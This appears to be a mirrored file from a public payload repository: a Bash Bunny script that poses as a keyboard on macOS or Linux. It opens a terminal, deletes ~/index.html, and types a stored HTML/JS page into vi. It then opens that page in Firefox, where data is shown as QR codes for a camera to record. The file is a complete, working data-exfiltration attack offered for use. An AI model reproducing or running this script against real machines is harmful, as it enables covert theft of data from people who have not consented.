mirror of
https://github.com/hak5/bashbunny-payloads.git
synced 2025-10-29 16:58:25 +00:00
60 lines
1.3 KiB
Bash
Executable File
60 lines
1.3 KiB
Bash
Executable File
#!/bin/bash
|
|
#
|
|
# Title: Optical Exfiltration
|
|
# Author: bg-wa
|
|
# Version: 1.0
|
|
# Targets: macOS, Linux
|
|
# Attack Modes: HID
|
|
# Sources: Hak5 2320, https://github.com/bg-wa/QRExtractor
|
|
# Description: Quick HID only attack to write an HTML/JS file to target machine
|
|
# and open a browser, to exfiltrate data Using QR Codes and a video recording device.
|
|
# Optional html params:
|
|
# base64: Passing a base64 string to this param will auto-start processing QR Codes.
|
|
# playback: Passing the string "finish" to this param will auto-play the results, when QR codes finish rendering.
|
|
# Example: Ln65: Q STRING firefox "$target_html?playback=finish&base64=my_long_string"
|
|
#
|
|
# LEDS:
|
|
# Magenta: Open vi
|
|
# Yellow Blink: Writing HTML
|
|
# Green: Browser Ready/Processing
|
|
#
|
|
|
|
ATTACKMODE HID
|
|
LED SETUP
|
|
|
|
target_html=\~\/index.html
|
|
|
|
RUN UNITY xterm
|
|
Q DELAY 1000
|
|
Q STRING rm "$target_html"
|
|
Q ENTER
|
|
Q DELAY 500
|
|
Q STRING vi "$target_html"
|
|
Q ENTER
|
|
Q DELAY 1000
|
|
Q STRING i
|
|
|
|
LED ATTACK
|
|
|
|
payload_dir=/root/udisk/payloads/$SWITCH_POSITION
|
|
source_html=$payload_dir/index.min.html
|
|
|
|
while IFS= read data
|
|
do
|
|
if [ "${data}" = " " ]
|
|
then
|
|
Q SPACE
|
|
else
|
|
Q STRING "$data"
|
|
fi
|
|
done < "$source_html"
|
|
|
|
Q ESC
|
|
Q STRING :x
|
|
Q ENTER
|
|
|
|
Q STRING firefox "$target_html"
|
|
Q ENTER
|
|
|
|
LED FINISH
|